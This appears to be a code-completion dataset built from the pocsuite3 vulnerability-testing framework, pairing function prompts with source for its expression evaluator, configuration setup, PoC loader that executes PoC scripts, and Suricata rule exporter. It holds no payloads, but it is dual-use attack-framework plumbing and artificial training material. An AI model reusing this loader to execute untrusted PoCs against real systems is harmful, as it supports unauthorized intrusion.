return False
# Check only valid, white-listed attributes are accessed
elif ast_node_class == "Attribute":
if not _check_attribute(ast_node):
return False
return True
def convert_logical_operators(expression: str) -> str:
"""
TODO, needs to be optimized in the future
https://www.dabeaz.com/ply/ply.html#ply_nn26
"""
return_bool_func = [
'compare_versions', 'contains', 'contains_all', 'contains_any', 'regex',
'starts_with', 'line_starts_with', 'ends_with', 'line_ends_with'
]
expression = re.sub(r'\s+&&\s+', ' and ', expression)
expression = re.sub(r'\s+\|\|\s+', ' or ', expression)
for f in return_bool_func:
expression = re.sub(fr'!\s*{f}\(', f'not {f}(', expression)
return expression
The provided code snippet includes necessary dependencies for implementing the `safe_eval` function. Write a Python function `def safe_eval(expression, variables)` to solve the following problem:
>>> safe_eval("moo", {"moo": 5}) 5 >>> exception_thrown = False >>> try: safe_eval("moo", {"cow": 5}) ... except Exception as e: exception_thrown = True >>> exception_thrown True
Here is the function:
def safe_eval(expression, variables):
"""
>>> safe_eval("moo", {"moo": 5})
5
>>> exception_thrown = False
>>> try: safe_eval("moo", {"cow": 5})
... except Exception as e: exception_thrown = True
>>> exception_thrown
True
"""
if not _check_expression(expression, allowed_variables=list(variables.keys())):
new_expression = convert_logical_operators(expression)
if expression != new_expression:
logger.debug(f'[+] Expressions convert: {expression} -> {new_expression}')
expression = new_expression
if not _check_expression(expression, allowed_variables=list(variables.keys())):
raise Exception(
f"Invalid expression {expression}, possibly due to unsupported functions in the template or "
"unresolved variables. If you suspect this is a Pocsuite3 issue, please submit an issue on GitHub.")
return eval(expression, globals(), variables) | >>> safe_eval("moo", {"moo": 5}) 5 >>> exception_thrown = False >>> try: safe_eval("moo", {"cow": 5}) ... except Exception as e: exception_thrown = True >>> exception_thrown True |
161,775 | import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection
import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener
def single_time_warn_message(message):
single_time_log_message(message, logging.WARN)
def stdout_encode(data):
ret = None
try:
data = data or ""
# Reference: http://bugs.python.org/issue1602
if IS_WIN:
output = data.encode(sys.stdout.encoding, "replace")
if '?' in output and '?' not in data:
warn_msg = "cannot properly display Unicode characters "
warn_msg += "inside Windows OS command prompt "
warn_msg += "(http://bugs.python.org/issue1602). All "
warn_msg += "unhandled occurances will result in "
warn_msg += "replacement with '?' character. Please, find "
warn_msg += "proper character representation inside "
warn_msg += "corresponding output files. "
single_time_warn_message(warn_msg)
ret = output
else:
ret = data.encode(sys.stdout.encoding)
except Exception:
ret = data.encode(UNICODE_ENCODING) if isinstance(data, str) else data
return ret
def _resolve_cross_references():
import pocsuite3
pocsuite3.lib.core.revision.stdout_encode = stdout_encode
pocsuite3.lib.core.convert.single_time_warn_message = single_time_warn_message | null |
161,776 | import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection
import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener
def _set_conf_attributes():
"""
This function set some needed attributes into the configuration
singleton.
"""
debug_msg = "initializing the configuration"
logger.debug(debug_msg)
conf.url = None
conf.url_file = None
conf.ports = []
conf.skip_target_port = False
conf.mode = 'verify'
conf.poc = None
conf.poc_keyword = None
conf.poc_list = None
conf.cookie = None
conf.host = None
conf.referer = None
conf.agent = None
conf.headers = None
conf.proxy = None
conf.proxy_cred = None
conf.proxies = {}
conf.timeout = 10
conf.retry = 0
conf.delay = 0
conf.http_headers = {}
conf.http_debug = 0
conf.ceye_token = None
conf.oob_server = None
conf.oob_token = None
conf.seebug_token = None
conf.zoomeye_token = None
conf.shodan_token = None
conf.fofa_user = None
conf.fofa_token = None
conf.quake_token = None
conf.hunter_token = None
conf.censys_uid = None
conf.censys_secret = None
conf.dork = None
conf.dork_zoomeye = None
conf.dork_shodan = None
conf.dork_fofa = None
conf.dork_quake = None
conf.dork_hunter = None
conf.dork_censys = None
conf.dork_b64 = False
conf.max_page = 1
conf.search_type = 'host'
conf.comparison = False
conf.vul_keyword = None
conf.ssvid = None
conf.plugins = []
conf.threads = 150
conf.batch = False
conf.check_requires = False
conf.quiet = False
conf.update_all = False
conf.new = False
conf.verbose = 1
conf.ipv6 = False
conf.multiple_targets = False
conf.pocs_path = None
conf.output_path = None
conf.plugin_name = None
conf.plugin_code = None
conf.connect_back_host = None
conf.connect_back_port = DEFAULT_LISTENER_PORT
conf.console_mode = False
conf.show_version = False
conf.api = False # api for zipoc
conf.ppt = False
conf.pcap = False
conf.rule = False
conf.rule_req = False
conf.rule_filename = None
conf.no_check = False
conf.show_options = False
conf.enable_tls_listener = False
# docker args
conf.docker_start = False
conf.docker_port = list()
conf.docker_env = list()
conf.docker_volume = list()
conf.docker_only = False
conf.requests_session_reuse = False
# web hook
conf.dingtalk_token = ""
conf.dingtalk_secret = ""
conf.wx_work_key = ""
def _set_kb_attributes(flush_all=True):
"""
This function set some needed attributes into the knowledge base
singleton.
"""
debug_msg = "initializing the knowledge base"
logger.debug(debug_msg)
kb.abs_file_paths = set()
kb.os = None
kb.os_version = None
kb.arch = None
kb.dbms = None
kb.auth_header = None
kb.counters = {}
kb.multi_thread_mode = False
kb.thread_continue = True
kb.thread_exception = False
kb.word_lists = None
kb.single_log_flags = set()
kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {}
kb.cache.regex = {}
kb.data = AttribDict()
kb.data.local_ips = []
kb.data.connect_back_ip = None
kb.data.connect_back_port = DEFAULT_LISTENER_PORT
kb.data.clients = []
kb.targets = OrderedSet()
kb.plugins = AttribDict()
kb.plugins.targets = AttribDict()
kb.plugins.pocs = AttribDict()
kb.plugins.results = AttribDict()
kb.results = []
kb.current_poc = None
kb.registered_pocs = AttribDict()
kb.task_queue = Queue()
kb.session_queue = Queue()
kb.cmd_line = DIY_OPTIONS or []
kb.comparison = None
def _merge_options(input_options, override_options):
"""
Merge command line options with configuration file and default options.
"""
if hasattr(input_options, "items"):
input_options_items = input_options.items()
else:
input_options_items = input_options.__dict__.items()
for key, value in input_options_items:
if key not in conf or value not in (None, False) or override_options:
conf[key] = value
if input_options.get("configFile"):
config_file_parser(input_options["configFile"])
merged_options.update(conf)
def _set_poc_options(input_options):
for line in input_options.keys():
if line not in CMD_PARSE_WHITELIST:
DIY_OPTIONS.append(line)
def check_path(path):
return True if path and os.path.exists(path) else False
logger = LOGGER
conf = AttribDict()
cmd_line_options = AttribDict()
paths = AttribDict()
class AttribDict(OrderedDict):
"""
AttrDict extends OrderedDict to provide attribute-style access.
Items starting with __ or _OrderedDict__ can't be accessed as attributes.
"""
__exclude_keys__ = set()
def __getattr__(self, name):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__getattribute__(name)
else:
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__setattr__(name, value)
self[name] = value
def __delattr__(self, name):
if (name.startswith('__')
or name.startswith('_OrderedDict__')
or name in self.__exclude_keys__):
return super(AttribDict, self).__delattr__(name)
del self[name]
def update():
if not conf.update_all:
return
logger.info('Checking the latest version number of pocsuite3 on pypi')
client = ServerProxy('https://pypi.python.org/pypi')
versions = client.package_releases('pocsuite3', True)
upstream_version = max(map(parse_version, versions))
current_version = parse_version(__version__)
logger.info(f'Current upstream version: {upstream_version}')
if current_version < upstream_version:
logger.info(''
'----[ 1.1 - Installtion & Upgrade Methods\n'
'\n'
'Python pip\n'
'\n'
' $ pip3 install -U pocsuite3\n'
'\n'
' $ use other pypi mirror\n'
' $ pip3 install -U -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3\n'
'\n'
'MacOS\n'
'\n'
' $ brew install pocsuite3\n'
'\n'
'Kali, Ubuntu 22.04, Debian\n'
'\n'
' $ sudo apt-get install pocsuite3\n'
'\n'
'Docker\n'
'\n'
' $ docker run -it pocsuite3/pocsuite3\n'
'\n'
'ArchLinux\n'
'\n'
' $ yay pocsuite3\n'
'\n'
'Install from source code\n'
'\n'
' $ wget https://github.com/knownsec/pocsuite3/archive/master.zip\n'
' $ unzip master.zip\n'
' $ cd pocsuite3-master\n'
' $ pip3 install -r requirements.txt\n'
' $ python3 setup.py install\n'
)
def regex_rule(files):
if not conf.rule_filename:
conf.rule_filename = "rule.rule"
for file_name in files:
regx_rules = ["name = '(.*)'",
r"suricata_request = '''([\s\S]*?)'''",
r"references = \['(.*)'\]", "createDate = '(.*)'", "updateDate = '(.*)'",
"vulID = '(.*)'",
"version = '(.*)'",
r"suricata_response = '''([\s\S]*?)'''",
]
information_list = {"name": "0",
"suricata_request": "1",
"references": "2",
"createDate": "3",
"updateDate": "4",
"vulID": "5",
"version": "6",
"suricata_response": "7",
"flowbits": ""}
st = get_file_text(file_name)
for key, value in information_list.items():
if value:
pattern = re.compile(regx_rules[int(value)])
cve_list = pattern.findall(st)
if cve_list:
if "name" in regx_rules[int(value)]:
information_list[key] = cve_list[0].replace("\n", "")
else:
if "suricata_request" not in regx_rules[int(value)] and "suricata_response" not in regx_rules[int(value)]:
information_list[key] = cve_list[0].replace("\n", "").replace(" ", "")
else:
information_list[key] = cve_list[0].replace("\n", "")
else:
information_list[key] = ""
if not information_list["suricata_request"]:
continue
if "、" in information_list["vulID"]:
information_list["vulID"] = information_list["vulID"].split("、")[0]
elif not information_list["vulID"]:
information_list["vulID"] = 0
if information_list["suricata_response"] and not conf.rule_req:
# 6220553==seebug.( ˇωˇ)
rule_to_server = '''alert http any any -> any any (msg:"{}";flow:established,to_server;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};flowbits:set,{};flowbits:noalert;sid:{};rev:{};)'''.format(
information_list["name"], information_list["suricata_request"], information_list["references"],
information_list["createDate"], information_list["updateDate"], information_list["name"].replace(" ", "_"),
6220553 + int(float(information_list["vulID"])) * 2, int(float(information_list["version"])))
rule_to_client = '''alert http any any -> any any (msg:"{}";flow:established,to_client;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};flowbits:isset,{};sid:{};rev:{};)'''.format(
information_list["name"], information_list["suricata_response"], information_list["references"],
information_list["createDate"], information_list["updateDate"], information_list["name"].replace(" ", "_"),
6220553 + int(float(information_list["vulID"])) * 2 + 1, int(float(information_list["version"])))
else:
rule_to_server = '''alert http any any -> any any (msg:"{}";flow:established,to_server;{}classtype:web-application-attack;reference:url,{}; metadata:created_at {}, updated_at {};sid:{};rev:{};)'''.format(
information_list["name"], information_list["suricata_request"], information_list["references"],
information_list["createDate"], information_list["updateDate"],
6220553 + int(float(information_list["vulID"])) * 2,
int(float(information_list["version"])))
rule_to_client = ""
with open(conf.rule_filename, "a", encoding="utf-8") as f:
f.write(rule_to_server+"\n")
f.write(rule_to_client+"\n")
f.close()
logger.info("{} rule is:".format(file_name[file_name.rfind("\\")+1:]))
print(rule_to_server)
print(rule_to_client)
def init_options(input_options=AttribDict(), override_options=False):
cmd_line_options.update(input_options)
_set_conf_attributes()
_set_poc_options(input_options)
_set_kb_attributes()
_merge_options(input_options, override_options)
# export rules, dont run the poc in the default status
if conf.rule or conf.rule_req:
logger.info("The rule export function is in use. The POC is not executed at this point")
if conf.pocs_path:
if check_path(conf.pocs_path):
paths.USER_POCS_PATH = conf.pocs_path
for root, dirs, files in os.walk(paths.USER_POCS_PATH):
files = list(filter(lambda x: not x.startswith("__") and x.endswith(".py"), files))
regex_rule(list(paths.USER_POCS_PATH + i for i in files))
if conf.poc:
regex_rule(conf.poc)
exit()
# if check version
if conf.show_version:
exit() | null |
161,777 | import os
from pocsuite3.lib.core.common import is_pocsuite3_poc, single_time_warn_message
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.register import load_string_to_module, load_file_to_module
kb = AttribDict()
def register_plugin(plugin_class):
plugin_name = plugin_class.__module__.split('.')[0]
plugin_category = plugin_class.category
if plugin_name not in kb.plugins[plugin_category]:
kb.plugins[plugin_category][plugin_name] = plugin_class() | null |
161,778 | import hashlib
The provided code snippet includes necessary dependencies for implementing the `cachedmethod` function. Write a Python function `def cachedmethod(f, cache={})` to solve the following problem:
Method with a cached content Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
Here is the function:
def cachedmethod(f, cache={}):
"""
Method with a cached content
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
"""
def _(*args, **kwargs):
key_string = "|".join(str(_) for _ in (f, args, kwargs)).encode()
key = int(hashlib.md5(key_string).hexdigest(), 16) & 0x7fffffffffffffff
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return _ | Method with a cached content Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ |
161,779 | import re
import pkg_resources
import importlib.machinery
import importlib.util
from importlib.abc import Loader
from pocsuite3.lib.core.common import (
multiple_replace, get_filename, get_md5, get_file_text,
is_pocsuite3_poc, get_poc_requires, get_poc_name)
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import POC_IMPORTDICT
class PocLoader(Loader):
def __init__(self, fullname, path):
self.fullname = fullname
self.path = path
self.data = None
def set_data(self, data):
self.data = data
def get_filename(self, fullname):
return self.path
def get_data(self, filename):
if filename.startswith('pocsuite://') and self.data:
if not is_pocsuite3_poc(self.data):
data = multiple_replace(self.data, POC_IMPORTDICT)
else:
data = self.data
else:
code = get_file_text(filename)
if not is_pocsuite3_poc(code):
data = multiple_replace(code, POC_IMPORTDICT)
else:
data = code
return data
def check_requires(data):
requires = get_poc_requires(data)
requires = [i.strip().strip('"').strip("'") for i in requires.split(',')] if requires else ['']
if requires[0]:
poc_name = get_poc_name(data)
info_msg = 'PoC script "{0}" requires "{1}" to be installed'.format(poc_name, ', '.join(requires))
logger.info(info_msg)
try:
for r in requires:
r = r.replace(' ', '')
install_name, import_name = (r.split(':') + [''])[0:2]
t = re.split('>|<|=|~', install_name)
if len(t) > 1:
install_name = t[0]
if not import_name:
import_name = install_name
__import__(import_name)
try:
ver = pkg_resources.get_distribution(install_name).version
except Exception:
ver = 'unknown'
logger.info(f'{install_name}=={ver} has been installed')
except ImportError:
err_msg = f'{install_name} not found, try install with "python -m pip install {install_name}"'
logger.error(err_msg)
raise SystemExit
def exec_module(self, module):
filename = self.get_filename(self.fullname)
poc_code = self.get_data(filename)
# convert yaml template to pocsuite3 poc script
if filename.endswith('.yaml') and re.search(r'matchers:\s+-', poc_code):
from pocsuite3.lib.yaml.nuclei import Nuclei
poc_code = str(Nuclei(poc_code))
self.check_requires(poc_code)
obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
try:
exec(obj, module.__dict__)
except Exception as err:
logger.error("Poc: '{}' exec arise error: {} ".format(filename, err))
def get_md5(value):
if isinstance(value, str):
value = value.encode(encoding='UTF-8')
return hashlib.md5(value).hexdigest()
logger = LOGGER
kb = AttribDict()
def load_string_to_module(code_string, fullname=None):
try:
module_name = 'pocs_{0}'.format(get_md5(code_string)) if fullname is None else fullname
file_path = 'pocsuite://{0}'.format(module_name)
poc_loader = PocLoader(module_name, file_path)
poc_loader.set_data(code_string)
spec = importlib.util.spec_from_file_location(module_name, file_path, loader=poc_loader)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
poc_model = kb.registered_pocs[module_name]
except KeyError:
poc_model = None
except ImportError:
error_msg = "load module '{0}' failed!".format(fullname)
logger.error(error_msg)
raise
return poc_model | null |
161,780 | import re
import pkg_resources
import importlib.machinery
import importlib.util
from importlib.abc import Loader
from pocsuite3.lib.core.common import (
multiple_replace, get_filename, get_md5, get_file_text,
is_pocsuite3_poc, get_poc_requires, get_poc_name)
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import POC_IMPORTDICT
kb = AttribDict()
def register_poc(poc_class):
module = poc_class.__module__.split('.')[0]
if module in kb.registered_pocs:
kb.current_poc = kb.registered_pocs[module]
return
kb.registered_pocs[module] = poc_class()
kb.current_poc = kb.registered_pocs[module] | null |
161,781 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def read_binary(filename):
content = ''
with open(filename, 'rb') as f:
content = f.read()
return content | null |
161,782 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
paths = AttribDict()
The provided code snippet includes necessary dependencies for implementing the `set_paths` function. Write a Python function `def set_paths(root_path)` to solve the following problem:
Sets absolute paths for project directories and files
Here is the function:
def set_paths(root_path):
"""
Sets absolute paths for project directories and files
"""
paths.POCSUITE_ROOT_PATH = root_path
paths.POCSUITE_DATA_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "data")
paths.POCSUITE_PLUGINS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "plugins")
paths.POCSUITE_POCS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "pocs")
paths.USER_POCS_PATH = None
paths.WEAK_PASS = os.path.join(paths.POCSUITE_DATA_PATH, "password-top100.txt")
paths.POCSUITE_HOME_PATH = os.path.expanduser("~")
_ = os.path.join(paths.POCSUITE_HOME_PATH, ".pocsuite")
paths.API_SHELL_HISTORY = os.path.join(_, "api.hst")
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
paths.POCSUITE_SHELL_HISTORY = os.path.join(_, "pocsuite.hst")
paths.POCSUITE_CONSOLE_HISTORY = os.path.join(_, "console.hst")
paths.POCSUITE_TMP_PATH = os.path.join(_, "tmp")
paths.POCSUITE_RC_PATH = os.path.join(paths.POCSUITE_HOME_PATH, ".pocsuiterc")
paths.POCSUITE_OUTPUT_PATH = paths.get("POCSUITE_OUTPUT_PATH", os.path.join(_, "output"))
paths.SHELLCODES_DEV_PATH = os.path.join(paths.POCSUITE_TMP_PATH, "tools") | Sets absolute paths for project directories and files |
161,783 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def data_to_stdout(data, bold=False):
"""
Writes text to the stdout (console) stream
"""
if not conf.get('quiet', False):
message = ""
if isinstance(data, str):
message = stdout_encode(data)
else:
message = data
sys.stdout.write(set_color(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
return
IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
BANNER = """\033[01;33m
,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' \033[0m\033[4;37m%s\033[0m
""" % (
(31 + hash(REVISION) % 6) if REVISION else 30,
VERSION_STRING.split("/")[-1],
SITE,
)
The provided code snippet includes necessary dependencies for implementing the `banner` function. Write a Python function `def banner()` to solve the following problem:
Function prints pocsuite banner with its version
Here is the function:
def banner():
"""
Function prints pocsuite banner with its version
"""
_ = BANNER
# if not getattr(LOGGER_HANDLER, "is_tty", False):
# _ = clear_colors(_)
if IS_WIN:
coloramainit()
data_to_stdout(_) | Function prints pocsuite banner with its version |
161,784 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def clear_colors(message):
ret = message
if message:
ret = re.sub(r"\x1b\[[\d;]+m", "", message)
return ret | null |
161,785 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
